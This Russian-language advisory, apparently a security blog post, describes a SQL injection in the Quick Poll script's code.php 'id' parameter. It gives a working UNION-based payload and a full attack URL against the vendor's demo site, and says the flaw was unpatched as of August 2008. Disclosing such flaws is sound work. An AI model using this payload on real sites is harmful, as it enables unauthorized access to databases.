Описание эксплойта:
Внедряемый запрос передается через параметр "id" сценария "code.php".
Пример получения имени администратора:
code.php? id=-85+union+ select+85,85,concat_ws(char(58), user(),version(),database()) +from+answers--
Демонстрация на сайте разработчика:
http://www.discountedscripts.com/ demos/newpoll/code.php? id=-85+union+select+85,85,concat_ws (char(58),user(),version(), database())+from+answers--
Описание уязвимости:
В Quick Poll обнаружена уязвимость к SQL-инъекции. Параметр "id" сценария "code.php", получаемый из URI, не фильтруется перед использованием в составе SQL-запроса. Атакующий, таким образом, может дополнить его произвольным запросом.
ЗАЩИТА:
По данным на 28 августа 2008 г., уязвимость не устранена.
Безопасность в интернете, то что должен знать каждый человек у которого есть компьютер! Информация будет полезна для администраторов, занимающихся обеспечением безопасности сетей, для программистов, стремящихся к созданию защищенных приложений, а также для всех тех, кто интересуется вопросами сетевой защиты.
0 коментарии:
Оставить коментарий